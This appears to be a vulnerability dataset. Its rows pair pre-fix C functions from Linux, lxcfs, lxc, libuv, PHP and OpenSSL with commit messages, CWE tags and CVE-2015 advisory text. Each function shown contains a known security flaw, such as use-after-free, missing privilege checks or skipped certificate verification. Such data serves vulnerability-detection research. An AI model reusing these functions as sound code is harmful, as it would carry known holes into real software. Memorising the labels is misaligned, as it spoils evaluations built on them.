/* SCTP-AUTH: Save the peer parameters from the new associations
* and also move the association shared keys over
*/
kfree(asoc->peer.peer_random);
asoc->peer.peer_random = new->peer.peer_random;
new->peer.peer_random = NULL;
kfree(asoc->peer.peer_chunks);
asoc->peer.peer_chunks = new->peer.peer_chunks;
new->peer.peer_chunks = NULL;
kfree(asoc->peer.peer_hmacs);
asoc->peer.peer_hmacs = new->peer.peer_hmacs;
new->peer.peer_hmacs = NULL;
sctp_auth_key_put(asoc->asoc_shared_key);
sctp_auth_asoc_init_active_key(asoc, GFP_ATOMIC);
}
| 245,205,618,481,032,000,000,000,000,000,000,000,000 | associola.c | 137,893,471,795,738,340,000,000,000,000,000,000,000 | [
"CWE-703"
] | CVE-2015-1421 | Use-after-free vulnerability in the sctp_assoc_update function in net/sctp/associola.c in the Linux kernel before 3.18.8 allows remote attackers to cause a denial of service (slab corruption and panic) or possibly have unspecified other impact by triggering an INIT collision that leads to improper handling of shared-key data. | https://nvd.nist.gov/vuln/detail/CVE-2015-1421 |
1,543 | lxcfs | 8ee2a503e102b1a43ec4d83113dc275ab20a869a | https://github.com/lxc/lxcfs | https://github.com/lxc/lxcfs/commit/8ee2a503e102b1a43ec4d83113dc275ab20a869a | Implement privilege check when moving tasks
When writing pids to a tasks file in lxcfs, lxcfs was checking
for privilege over the tasks file but not over the pid being
moved. Since the cgm_movepid request is done as root on the host,
not with the requestor's credentials, we must copy the check which
cgmanager was doing to ensure that the requesting task is allowed
to change the victim task's cgroup membership.
This is CVE-2015-1344
https://bugs.launchpad.net/ubuntu/+source/lxcfs/+bug/1512854
Signed-off-by: Serge Hallyn <serge.hallyn@ubuntu.com> | 1 | static bool do_write_pids(pid_t tpid, const char *contrl, const char *cg, const char *file, const char *buf)
{
int sock[2] = {-1, -1};
pid_t qpid, cpid = -1;
FILE *pids_file = NULL;
bool answer = false, fail = false;
pids_file = open_pids_file(contrl, cg);
if (!pids_file)
return false;
/*
* write the pids to a socket, have helper in writer's pidns
* call movepid for us
*/
if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sock) < 0) {
perror("socketpair");
goto out;
}
cpid = fork();
if (cpid == -1)
goto out;
if (!cpid) { // child
fclose(pids_file);
pid_from_ns_wrapper(sock[1], tpid);
}
const char *ptr = buf;
while (sscanf(ptr, "%d", &qpid) == 1) {
struct ucred cred;
char v;
if (write(sock[0], &qpid, sizeof(qpid)) != sizeof(qpid)) {
fprintf(stderr, "%s: error writing pid to child: %s\n",
__func__, strerror(errno));
goto out;
}
if (recv_creds(sock[0], &cred, &v)) {
if (v == '0') {
if (fprintf(pids_file, "%d", (int) cred.pid) < 0)
fail = true;
}
}
ptr = strchr(ptr, '\n');
if (!ptr)
break;
ptr++;
}
/* All good, write the value */
qpid = -1;
if (write(sock[0], &qpid ,sizeof(qpid)) != sizeof(qpid))
fprintf(stderr, "Warning: failed to ask child to exit\n");
if (!fail)
answer = true;
out:
if (cpid != -1)
wait_for_pid(cpid);
if (sock[0] != -1) {
close(sock[0]);
close(sock[1]);
}
if (pids_file) {
if (fclose(pids_file) != 0)
answer = false;
}
return answer;
}
| 6,339,406,417,675,714,000,000,000,000,000,000,000 | None | null | [
"CWE-264"
] | CVE-2015-1344 | The do_write_pids function in lxcfs.c in LXCFS before 0.12 does not properly check permissions, which allows local users to gain privileges by writing a pid to the tasks file. | https://nvd.nist.gov/vuln/detail/CVE-2015-1344 |
1,565 | lxc | 72cf81f6a3404e35028567db2c99a90406e9c6e6 | https://github.com/lxc/lxc | https://github.com/lxc/lxc/commit/72cf81f6a3404e35028567db2c99a90406e9c6e6 | CVE-2015-1331: lxclock: use /run/lxc/lock rather than /run/lock/lxc
This prevents an unprivileged user to use LXC to create arbitrary file
on the filesystem.
Signed-off-by: Serge Hallyn <serge.hallyn@ubuntu.com>
Signed-off-by: Tyler Hicks <tyhicks@canonical.com>
Acked-by: Stéphane Graber <stgraber@ubuntu.com> | 1 | static char *lxclock_name(const char *p, const char *n)
{
int ret;
int len;
char *dest;
char *rundir;
/* lockfile will be:
* "/run" + "/lock/lxc/$lxcpath/$lxcname + '\0' if root
* or
* $XDG_RUNTIME_DIR + "/lock/lxc/$lxcpath/$lxcname + '\0' if non-root
*/
/* length of "/lock/lxc/" + $lxcpath + "/" + "." + $lxcname + '\0' */
len = strlen("/lock/lxc/") + strlen(n) + strlen(p) + 3;
rundir = get_rundir();
if (!rundir)
return NULL;
len += strlen(rundir);
if ((dest = malloc(len)) == NULL) {
free(rundir);
return NULL;
}
ret = snprintf(dest, len, "%s/lock/lxc/%s", rundir, p);
if (ret < 0 || ret >= len) {
free(dest);
free(rundir);
return NULL;
}
ret = mkdir_p(dest, 0755);
if (ret < 0) {
/* fall back to "/tmp/" + $(id -u) + "/lxc" + $lxcpath + "/" + "." + $lxcname + '\0'
* * maximum length of $(id -u) is 10 calculated by (log (2 ** (sizeof(uid_t) * 8) - 1) / log 10 + 1)
* * lxcpath always starts with '/'
*/
int l2 = 22 + strlen(n) + strlen(p);
if (l2 > len) {
char *d;
d = realloc(dest, l2);
if (!d) {
free(dest);
free(rundir);
return NULL;
}
len = l2;
dest = d;
}
ret = snprintf(dest, len, "/tmp/%d/lxc%s", geteuid(), p);
if (ret < 0 || ret >= len) {
free(dest);
free(rundir);
return NULL;
}
ret = mkdir_p(dest, 0755);
if (ret < 0) {
free(dest);
free(rundir);
return NULL;
}
ret = snprintf(dest, len, "/tmp/%d/lxc%s/.%s", geteuid(), p, n);
} else
ret = snprintf(dest, len, "%s/lock/lxc/%s/.%s", rundir, p, n);
free(rundir);
if (ret < 0 || ret >= len) {
free(dest);
return NULL;
}
return dest;
}
| 245,452,041,723,366,300,000,000,000,000,000,000,000 | lxclock.c | 215,606,032,687,124,040,000,000,000,000,000,000,000 | [
"CWE-59"
] | CVE-2015-1331 | lxclock.c in LXC 1.1.2 and earlier allows local users to create arbitrary files via a symlink attack on /run/lock/lxc/*. | https://nvd.nist.gov/vuln/detail/CVE-2015-1331 |
1,567 | libuv | 66ab38918c911bcff025562cf06237d7fedaba0c | https://github.com/libuv/libuv | https://github.com/libuv/libuv/commit/66ab38918c911bcff025562cf06237d7fedaba0c | unix: call setgoups before calling setuid/setgid
Partial fix for #1093 | 1 | static void uv__process_child_init(const uv_process_options_t* options,
int stdio_count,
int (*pipes)[2],
int error_fd) {
int close_fd;
int use_fd;
int fd;
if (options->flags & UV_PROCESS_DETACHED)
setsid();
for (fd = 0; fd < stdio_count; fd++) {
close_fd = pipes[fd][0];
use_fd = pipes[fd][1];
if (use_fd < 0) {
if (fd >= 3)
continue;
else {
/* redirect stdin, stdout and stderr to /dev/null even if UV_IGNORE is
* set
*/
use_fd = open("/dev/null", fd == 0 ? O_RDONLY : O_RDWR);
close_fd = use_fd;
if (use_fd == -1) {
uv__write_int(error_fd, -errno);
perror("failed to open stdio");
_exit(127);
}
}
}
if (fd == use_fd)
uv__cloexec(use_fd, 0);
else
dup2(use_fd, fd);
if (fd <= 2)
uv__nonblock(fd, 0);
if (close_fd != -1)
uv__close(close_fd);
}
for (fd = 0; fd < stdio_count; fd++) {
use_fd = pipes[fd][1];
if (use_fd >= 0 && fd != use_fd)
close(use_fd);
}
if (options->cwd != NULL && chdir(options->cwd)) {
uv__write_int(error_fd, -errno);
perror("chdir()");
_exit(127);
}
if ((options->flags & UV_PROCESS_SETGID) && setgid(options->gid)) {
uv__write_int(error_fd, -errno);
perror("setgid()");
_exit(127);
}
if ((options->flags & UV_PROCESS_SETUID) && setuid(options->uid)) {
uv__write_int(error_fd, -errno);
perror("setuid()");
_exit(127);
}
if (options->env != NULL) {
environ = options->env;
}
execvp(options->file, options->args);
uv__write_int(error_fd, -errno);
perror("execvp()");
_exit(127);
}
| 260,532,967,559,578,820,000,000,000,000,000,000,000 | process.c | 230,071,590,411,145,400,000,000,000,000,000,000,000 | [
"CWE-264"
] | CVE-2015-0278 | libuv before 0.10.34 does not properly drop group privileges, which allows context-dependent attackers to gain privileges via unspecified vectors. | https://nvd.nist.gov/vuln/detail/CVE-2015-0278 |
1,578 | linux | f3747379accba8e95d70cec0eae0582c8c182050 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/f3747379accba8e95d70cec0eae0582c8c182050 | KVM: x86: SYSENTER emulation is broken
SYSENTER emulation is broken in several ways:
1. It misses the case of 16-bit code segments completely (CVE-2015-0239).
2. MSR_IA32_SYSENTER_CS is checked in 64-bit mode incorrectly (bits 0 and 1 can
still be set without causing #GP).
3. MSR_IA32_SYSENTER_EIP and MSR_IA32_SYSENTER_ESP are not masked in
legacy-mode.
4. There is some unneeded code.
Fix it.
Cc: stable@vger.linux.org
Signed-off-by: Nadav Amit <namit@cs.technion.ac.il>
Signed-off-by: Paolo Bonzini <pbonzini@redhat.com> | 1 | static int em_sysenter(struct x86_emulate_ctxt *ctxt)
{
const struct x86_emulate_ops *ops = ctxt->ops;
struct desc_struct cs, ss;
u64 msr_data;
u16 cs_sel, ss_sel;
u64 efer = 0;
ops->get_msr(ctxt, MSR_EFER, &efer);
/* inject #GP if in real mode */
if (ctxt->mode == X86EMUL_MODE_REAL)
return emulate_gp(ctxt, 0);
/*
* Not recognized on AMD in compat mode (but is recognized in legacy
* mode).
*/
if ((ctxt->mode == X86EMUL_MODE_PROT32) && (efer & EFER_LMA)
&& !vendor_intel(ctxt))
return emulate_ud(ctxt);
/* sysenter/sysexit have not been tested in 64bit mode. */
if (ctxt->mode == X86EMUL_MODE_PROT64)
return X86EMUL_UNHANDLEABLE;
setup_syscalls_segments(ctxt, &cs, &ss);
ops->get_msr(ctxt, MSR_IA32_SYSENTER_CS, &msr_data);
switch (ctxt->mode) {
case X86EMUL_MODE_PROT32:
if ((msr_data & 0xfffc) == 0x0)
return emulate_gp(ctxt, 0);
break;
case X86EMUL_MODE_PROT64:
if (msr_data == 0x0)
return emulate_gp(ctxt, 0);
break;
default:
break;
}
ctxt->eflags &= ~(EFLG_VM | EFLG_IF);
cs_sel = (u16)msr_data;
cs_sel &= ~SELECTOR_RPL_MASK;
ss_sel = cs_sel + 8;
ss_sel &= ~SELECTOR_RPL_MASK;
if (ctxt->mode == X86EMUL_MODE_PROT64 || (efer & EFER_LMA)) {
cs.d = 0;
cs.l = 1;
}
ops->set_segment(ctxt, cs_sel, &cs, 0, VCPU_SREG_CS);
ops->set_segment(ctxt, ss_sel, &ss, 0, VCPU_SREG_SS);
ops->get_msr(ctxt, MSR_IA32_SYSENTER_EIP, &msr_data);
ctxt->_eip = msr_data;
ops->get_msr(ctxt, MSR_IA32_SYSENTER_ESP, &msr_data);
*reg_write(ctxt, VCPU_REGS_RSP) = msr_data;
return X86EMUL_CONTINUE;
}
| 288,467,064,513,453,420,000,000,000,000,000,000,000 | emulate.c | 260,001,730,116,912,800,000,000,000,000,000,000,000 | [
"CWE-362"
] | CVE-2015-0239 | The em_sysenter function in arch/x86/kvm/emulate.c in the Linux kernel before 3.18.5, when the guest OS lacks SYSENTER MSR initialization, allows guest OS users to gain guest OS privileges or cause a denial of service (guest OS crash) by triggering use of a 16-bit code segment for emulation of a SYSENTER instruction. | https://nvd.nist.gov/vuln/detail/CVE-2015-0239 |
1,579 | php-src | b585a3aed7880a5fa5c18e2b838fc96f40e075bd | https://github.com/php/php-src | https://github.com/php/php-src/commit/b585a3aed7880a5fa5c18e2b838fc96f40e075bd | Fix for bug #68710 (Use After Free Vulnerability in PHP's unserialize()) | 1 | static inline int process_nested_data(UNSERIALIZE_PARAMETER, HashTable *ht, long elements, int objprops)
{
while (elements-- > 0) {
zval *key, *data, **old_data;
ALLOC_INIT_ZVAL(key);
if (!php_var_unserialize(&key, p, max, NULL TSRMLS_CC)) {
zval_dtor(key);
FREE_ZVAL(key);
return 0;
}
if (Z_TYPE_P(key) != IS_LONG && Z_TYPE_P(key) != IS_STRING) {
zval_dtor(key);
FREE_ZVAL(key);
return 0;
}
ALLOC_INIT_ZVAL(data);
if (!php_var_unserialize(&data, p, max, var_hash TSRMLS_CC)) {
zval_dtor(key);
FREE_ZVAL(key);
zval_dtor(data);
FREE_ZVAL(data);
return 0;
}
if (!objprops) {
switch (Z_TYPE_P(key)) {
case IS_LONG:
if (zend_hash_index_find(ht, Z_LVAL_P(key), (void **)&old_data)==SUCCESS) {
var_push_dtor(var_hash, old_data);
}
zend_hash_index_update(ht, Z_LVAL_P(key), &data, sizeof(data), NULL);
break;
case IS_STRING:
if (zend_symtable_find(ht, Z_STRVAL_P(key), Z_STRLEN_P(key) + 1, (void **)&old_data)==SUCCESS) {
var_push_dtor(var_hash, old_data);
}
zend_symtable_update(ht, Z_STRVAL_P(key), Z_STRLEN_P(key) + 1, &data, sizeof(data), NULL);
break;
}
} else {
/* object properties should include no integers */
convert_to_string(key);
if (zend_symtable_find(ht, Z_STRVAL_P(key), Z_STRLEN_P(key) + 1, (void **)&old_data)==SUCCESS) {
var_push_dtor(var_hash, old_data);
}
zend_hash_update(ht, Z_STRVAL_P(key), Z_STRLEN_P(key) + 1, &data,
sizeof data, NULL);
}
zval_dtor(key);
FREE_ZVAL(key);
if (elements && *(*p-1) != ';' && *(*p-1) != '}') {
(*p)--;
return 0;
}
}
| 722,330,690,057,935,600,000,000,000,000,000,000 | None | null | [
"CWE-94"
] | CVE-2015-0231 | Use-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re in PHP before 5.4.37, 5.5.x before 5.5.21, and 5.6.x before 5.6.5 allows remote attackers to execute arbitrary code via a crafted unserialize call that leverages improper handling of duplicate numerical keys within the serialized properties of an object. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-8142. | https://nvd.nist.gov/vuln/detail/CVE-2015-0231 |
1,580 | openssl | 103b171d8fc282ef435f8de9afbf7782e312961f | https://github.com/openssl/openssl | https://github.com/openssl/openssl/commit/103b171d8fc282ef435f8de9afbf7782e312961f | A memory leak can occur in dtls1_buffer_record if either of the calls to
ssl3_setup_buffers or pqueue_insert fail. The former will fail if there is a
malloc failure, whilst the latter will fail if attempting to add a duplicate
record to the queue. This should never happen because duplicate records should
be detected and dropped before any attempt to add them to the queue.
Unfortunately records that arrive that are for the next epoch are not being
recorded correctly, and therefore replays are not being detected.
Additionally, these "should not happen" failures that can occur in
dtls1_buffer_record are not being treated as fatal and therefore an attacker
could exploit this by sending repeated replay records for the next epoch,
eventually causing a DoS through memory exhaustion.
Thanks to Chris Mueller for reporting this issue and providing initial
analysis and a patch. Further analysis and the final patch was performed by
Matt Caswell from the OpenSSL development team.
CVE-2015-0206
Reviewed-by: Dr Stephen Henson <steve@openssl.org> | 1 | dtls1_buffer_record(SSL *s, record_pqueue *queue, unsigned char *priority)
{
DTLS1_RECORD_DATA *rdata;
pitem *item;
/* Limit the size of the queue to prevent DOS attacks */
if (pqueue_size(queue->q) >= 100)
return 0;
rdata = OPENSSL_malloc(sizeof(DTLS1_RECORD_DATA));
item = pitem_new(priority, rdata);
if (rdata == NULL || item == NULL)
{
if (rdata != NULL) OPENSSL_free(rdata);
if (item != NULL) pitem_free(item);
SSLerr(SSL_F_DTLS1_BUFFER_RECORD, ERR_R_INTERNAL_ERROR);
return(0);
}
rdata->packet = s->packet;
rdata->packet_length = s->packet_length;
memcpy(&(rdata->rbuf), &(s->s3->rbuf), sizeof(SSL3_BUFFER));
memcpy(&(rdata->rrec), &(s->s3->rrec), sizeof(SSL3_RECORD));
item->data = rdata;
#ifndef OPENSSL_NO_SCTP
/* Store bio_dgram_sctp_rcvinfo struct */
if (BIO_dgram_is_sctp(SSL_get_rbio(s)) &&
(s->state == SSL3_ST_SR_FINISHED_A || s->state == SSL3_ST_CR_FINISHED_A)) {
BIO_ctrl(SSL_get_rbio(s), BIO_CTRL_DGRAM_SCTP_GET_RCVINFO, sizeof(rdata->recordinfo), &rdata->recordinfo);
}
#endif
s->packet = NULL;
s->packet_length = 0;
memset(&(s->s3->rbuf), 0, sizeof(SSL3_BUFFER));
memset(&(s->s3->rrec), 0, sizeof(SSL3_RECORD));
if (!ssl3_setup_buffers(s))
{
SSLerr(SSL_F_DTLS1_BUFFER_RECORD, ERR_R_INTERNAL_ERROR);
OPENSSL_free(rdata);
pitem_free(item);
return(0);
}
/* insert should not fail, since duplicates are dropped */
if (pqueue_insert(queue->q, item) == NULL)
{
SSLerr(SSL_F_DTLS1_BUFFER_RECORD, ERR_R_INTERNAL_ERROR);
OPENSSL_free(rdata);
pitem_free(item);
return(0);
}
return(1);
}
| 114,939,372,772,634,080,000,000,000,000,000,000,000 | None | null | [
"CWE-119"
] | CVE-2015-0206 | Memory leak in the dtls1_buffer_record function in d1_pkt.c in OpenSSL 1.0.0 before 1.0.0p and 1.0.1 before 1.0.1k allows remote attackers to cause a denial of service (memory consumption) by sending many duplicate records for the next epoch, leading to failure of replay detection. | https://nvd.nist.gov/vuln/detail/CVE-2015-0206 |
1,584 | openssl | 1421e0c584ae9120ca1b88098f13d6d2e90b83a3 | https://github.com/openssl/openssl | https://github.com/openssl/openssl/commit/1421e0c584ae9120ca1b88098f13d6d2e90b83a3 | Unauthenticated DH client certificate fix.
Fix to prevent use of DH client certificates without sending
certificate verify message.
If we've used a client certificate to generate the premaster secret
ssl3_get_client_key_exchange returns 2 and ssl3_get_cert_verify is
never called.
We can only skip the certificate verify message in
ssl3_get_cert_verify if the client didn't send a certificate.
Thanks to Karthikeyan Bhargavan for reporting this issue.
CVE-2015-0205
Reviewed-by: Matt Caswell <matt@openssl.org> | 1 | int ssl3_get_cert_verify(SSL *s)
{
EVP_PKEY *pkey=NULL;
unsigned char *p;
int al,ok,ret=0;
long n;
int type=0,i,j;
X509 *peer;
const EVP_MD *md = NULL;
EVP_MD_CTX mctx;
EVP_MD_CTX_init(&mctx);
n=s->method->ssl_get_message(s,
SSL3_ST_SR_CERT_VRFY_A,
SSL3_ST_SR_CERT_VRFY_B,
-1,
SSL3_RT_MAX_PLAIN_LENGTH,
&ok);
if (!ok) return((int)n);
if (s->session->peer != NULL)
{
peer=s->session->peer;
pkey=X509_get_pubkey(peer);
type=X509_certificate_type(peer,pkey);
}
else
{
peer=NULL;
pkey=NULL;
}
if (s->s3->tmp.message_type != SSL3_MT_CERTIFICATE_VERIFY)
{
s->s3->tmp.reuse_message=1;
if ((peer != NULL) && (type & EVP_PKT_SIGN))
{
al=SSL_AD_UNEXPECTED_MESSAGE;
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_MISSING_VERIFY_MESSAGE);
goto f_err;
}
ret=1;
goto end;
}
if (peer == NULL)
{
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_NO_CLIENT_CERT_RECEIVED);
al=SSL_AD_UNEXPECTED_MESSAGE;
goto f_err;
}
if (!(type & EVP_PKT_SIGN))
{
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_SIGNATURE_FOR_NON_SIGNING_CERTIFICATE);
al=SSL_AD_ILLEGAL_PARAMETER;
goto f_err;
}
if (s->s3->change_cipher_spec)
{
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_CCS_RECEIVED_EARLY);
al=SSL_AD_UNEXPECTED_MESSAGE;
goto f_err;
}
/* we now have a signature that we need to verify */
p=(unsigned char *)s->init_msg;
/* Check for broken implementations of GOST ciphersuites */
/* If key is GOST and n is exactly 64, it is bare
* signature without length field */
if (n==64 && (pkey->type==NID_id_GostR3410_94 ||
pkey->type == NID_id_GostR3410_2001) )
{
i=64;
}
else
{
if (SSL_USE_SIGALGS(s))
{
int rv = tls12_check_peer_sigalg(&md, s, p, pkey);
if (rv == -1)
{
al = SSL_AD_INTERNAL_ERROR;
goto f_err;
}
else if (rv == 0)
{
al = SSL_AD_DECODE_ERROR;
goto f_err;
}
#ifdef SSL_DEBUG
fprintf(stderr, "USING TLSv1.2 HASH %s\n", EVP_MD_name(md));
#endif
p += 2;
n -= 2;
}
n2s(p,i);
n-=2;
if (i > n)
{
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_LENGTH_MISMATCH);
al=SSL_AD_DECODE_ERROR;
goto f_err;
}
}
j=EVP_PKEY_size(pkey);
if ((i > j) || (n > j) || (n <= 0))
{
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_WRONG_SIGNATURE_SIZE);
al=SSL_AD_DECODE_ERROR;
goto f_err;
}
if (SSL_USE_SIGALGS(s))
{
long hdatalen = 0;
void *hdata;
hdatalen = BIO_get_mem_data(s->s3->handshake_buffer, &hdata);
if (hdatalen <= 0)
{
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY, ERR_R_INTERNAL_ERROR);
al=SSL_AD_INTERNAL_ERROR;
goto f_err;
}
#ifdef SSL_DEBUG
fprintf(stderr, "Using TLS 1.2 with client verify alg %s\n",
EVP_MD_name(md));
#endif
if (!EVP_VerifyInit_ex(&mctx, md, NULL)
|| !EVP_VerifyUpdate(&mctx, hdata, hdatalen))
{
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY, ERR_R_EVP_LIB);
al=SSL_AD_INTERNAL_ERROR;
goto f_err;
}
if (EVP_VerifyFinal(&mctx, p , i, pkey) <= 0)
{
al=SSL_AD_DECRYPT_ERROR;
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_BAD_SIGNATURE);
goto f_err;
}
}
else
#ifndef OPENSSL_NO_RSA
if (pkey->type == EVP_PKEY_RSA)
{
i=RSA_verify(NID_md5_sha1, s->s3->tmp.cert_verify_md,
MD5_DIGEST_LENGTH+SHA_DIGEST_LENGTH, p, i,
pkey->pkey.rsa);
if (i < 0)
{
al=SSL_AD_DECRYPT_ERROR;
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_BAD_RSA_DECRYPT);
goto f_err;
}
if (i == 0)
{
al=SSL_AD_DECRYPT_ERROR;
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_BAD_RSA_SIGNATURE);
goto f_err;
}
}
else
#endif
#ifndef OPENSSL_NO_DSA
if (pkey->type == EVP_PKEY_DSA)
{
j=DSA_verify(pkey->save_type,
&(s->s3->tmp.cert_verify_md[MD5_DIGEST_LENGTH]),
SHA_DIGEST_LENGTH,p,i,pkey->pkey.dsa);
if (j <= 0)
{
/* bad signature */
al=SSL_AD_DECRYPT_ERROR;
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_BAD_DSA_SIGNATURE);
goto f_err;
}
}
else
#endif
#ifndef OPENSSL_NO_ECDSA
if (pkey->type == EVP_PKEY_EC)
{
j=ECDSA_verify(pkey->save_type,
&(s->s3->tmp.cert_verify_md[MD5_DIGEST_LENGTH]),
SHA_DIGEST_LENGTH,p,i,pkey->pkey.ec);
if (j <= 0)
{
/* bad signature */
al=SSL_AD_DECRYPT_ERROR;
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,
SSL_R_BAD_ECDSA_SIGNATURE);
goto f_err;
}
}
else
#endif
if (pkey->type == NID_id_GostR3410_94 || pkey->type == NID_id_GostR3410_2001)
{ unsigned char signature[64];
int idx;
EVP_PKEY_CTX *pctx = EVP_PKEY_CTX_new(pkey,NULL);
EVP_PKEY_verify_init(pctx);
if (i!=64) {
fprintf(stderr,"GOST signature length is %d",i);
}
for (idx=0;idx<64;idx++) {
signature[63-idx]=p[idx];
}
j=EVP_PKEY_verify(pctx,signature,64,s->s3->tmp.cert_verify_md,32);
EVP_PKEY_CTX_free(pctx);
if (j<=0)
{
al=SSL_AD_DECRYPT_ERROR;
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,
SSL_R_BAD_ECDSA_SIGNATURE);
goto f_err;
}
}
else
{
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,ERR_R_INTERNAL_ERROR);
al=SSL_AD_UNSUPPORTED_CERTIFICATE;
goto f_err;
}
ret=1;
if (0)
{
f_err:
ssl3_send_alert(s,SSL3_AL_FATAL,al);
}
end:
if (s->s3->handshake_buffer)
{
BIO_free(s->s3->handshake_buffer);
s->s3->handshake_buffer = NULL;
s->s3->flags &= ~TLS1_FLAGS_KEEP_HANDSHAKE;
}
EVP_MD_CTX_cleanup(&mctx);
EVP_PKEY_free(pkey);
return(ret);
}
| 212,984,391,365,092,660,000,000,000,000,000,000,000 | None | null | [
"CWE-310"
] | CVE-2015-0205 | The ssl3_get_cert_verify function in s3_srvr.c in OpenSSL 1.0.0 before 1.0.0p and 1.0.1 before 1.0.1k accepts client authentication with a Diffie-Hellman (DH) certificate without requiring a CertificateVerify message, which allows remote attackers to obtain access without knowledge of a private key via crafted TLS Handshake Protocol traffic to a server that recognizes a Certification Authority with DH support. | https://nvd.nist.gov/vuln/detail/CVE-2015-0205 |
1,586 | openssl | ce325c60c74b0fa784f5872404b722e120e5cab0 | https://github.com/openssl/openssl | https://github.com/openssl/openssl/commit/ce325c60c74b0fa784f5872404b722e120e5cab0 | Only allow ephemeral RSA keys in export ciphersuites.
OpenSSL clients would tolerate temporary RSA keys in non-export
ciphersuites. It also had an option SSL_OP_EPHEMERAL_RSA which
enabled this server side. Remove both options as they are a
protocol violation.
Thanks to Karthikeyan Bhargavan for reporting this issue.
(CVE-2015-0204)
Reviewed-by: Matt Caswell <matt@openssl.org> | 1 | int ssl3_get_key_exchange(SSL *s)
{
#ifndef OPENSSL_NO_RSA
unsigned char *q,md_buf[EVP_MAX_MD_SIZE*2];
#endif
EVP_MD_CTX md_ctx;
unsigned char *param,*p;
int al,j,ok;
long i,param_len,n,alg_k,alg_a;
EVP_PKEY *pkey=NULL;
const EVP_MD *md = NULL;
#ifndef OPENSSL_NO_RSA
RSA *rsa=NULL;
#endif
#ifndef OPENSSL_NO_DH
DH *dh=NULL;
#endif
#ifndef OPENSSL_NO_ECDH
EC_KEY *ecdh = NULL;
BN_CTX *bn_ctx = NULL;
EC_POINT *srvr_ecpoint = NULL;
int curve_nid = 0;
int encoded_pt_len = 0;
#endif
EVP_MD_CTX_init(&md_ctx);
/* use same message size as in ssl3_get_certificate_request()
* as ServerKeyExchange message may be skipped */
n=s->method->ssl_get_message(s,
SSL3_ST_CR_KEY_EXCH_A,
SSL3_ST_CR_KEY_EXCH_B,
-1,
s->max_cert_list,
&ok);
if (!ok) return((int)n);
alg_k=s->s3->tmp.new_cipher->algorithm_mkey;
if (s->s3->tmp.message_type != SSL3_MT_SERVER_KEY_EXCHANGE)
{
/*
* Can't skip server key exchange if this is an ephemeral
* ciphersuite.
*/
if (alg_k & (SSL_kDHE|SSL_kECDHE))
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, SSL_R_UNEXPECTED_MESSAGE);
al = SSL_AD_UNEXPECTED_MESSAGE;
goto f_err;
}
#ifndef OPENSSL_NO_PSK
/* In plain PSK ciphersuite, ServerKeyExchange can be
omitted if no identity hint is sent. Set
session->sess_cert anyway to avoid problems
later.*/
if (alg_k & SSL_kPSK)
{
s->session->sess_cert=ssl_sess_cert_new();
if (s->ctx->psk_identity_hint)
OPENSSL_free(s->ctx->psk_identity_hint);
s->ctx->psk_identity_hint = NULL;
}
#endif
s->s3->tmp.reuse_message=1;
return(1);
}
param=p=(unsigned char *)s->init_msg;
if (s->session->sess_cert != NULL)
{
#ifndef OPENSSL_NO_RSA
if (s->session->sess_cert->peer_rsa_tmp != NULL)
{
RSA_free(s->session->sess_cert->peer_rsa_tmp);
s->session->sess_cert->peer_rsa_tmp=NULL;
}
#endif
#ifndef OPENSSL_NO_DH
if (s->session->sess_cert->peer_dh_tmp)
{
DH_free(s->session->sess_cert->peer_dh_tmp);
s->session->sess_cert->peer_dh_tmp=NULL;
}
#endif
#ifndef OPENSSL_NO_ECDH
if (s->session->sess_cert->peer_ecdh_tmp)
{
EC_KEY_free(s->session->sess_cert->peer_ecdh_tmp);
s->session->sess_cert->peer_ecdh_tmp=NULL;
}
#endif
}
else
{
s->session->sess_cert=ssl_sess_cert_new();
}
/* Total length of the parameters including the length prefix */
param_len=0;
alg_a=s->s3->tmp.new_cipher->algorithm_auth;
al=SSL_AD_DECODE_ERROR;
#ifndef OPENSSL_NO_PSK
if (alg_k & SSL_kPSK)
{
char tmp_id_hint[PSK_MAX_IDENTITY_LEN+1];
param_len = 2;
if (param_len > n)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_LENGTH_TOO_SHORT);
goto f_err;
}
n2s(p,i);
/* Store PSK identity hint for later use, hint is used
* in ssl3_send_client_key_exchange. Assume that the
* maximum length of a PSK identity hint can be as
* long as the maximum length of a PSK identity. */
if (i > PSK_MAX_IDENTITY_LEN)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_DATA_LENGTH_TOO_LONG);
goto f_err;
}
if (i > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_BAD_PSK_IDENTITY_HINT_LENGTH);
goto f_err;
}
param_len += i;
/* If received PSK identity hint contains NULL
* characters, the hint is truncated from the first
* NULL. p may not be ending with NULL, so create a
* NULL-terminated string. */
memcpy(tmp_id_hint, p, i);
memset(tmp_id_hint+i, 0, PSK_MAX_IDENTITY_LEN+1-i);
if (s->ctx->psk_identity_hint != NULL)
OPENSSL_free(s->ctx->psk_identity_hint);
s->ctx->psk_identity_hint = BUF_strdup(tmp_id_hint);
if (s->ctx->psk_identity_hint == NULL)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, ERR_R_MALLOC_FAILURE);
goto f_err;
}
p+=i;
n-=param_len;
}
else
#endif /* !OPENSSL_NO_PSK */
#ifndef OPENSSL_NO_SRP
if (alg_k & SSL_kSRP)
{
param_len = 2;
if (param_len > n)
{
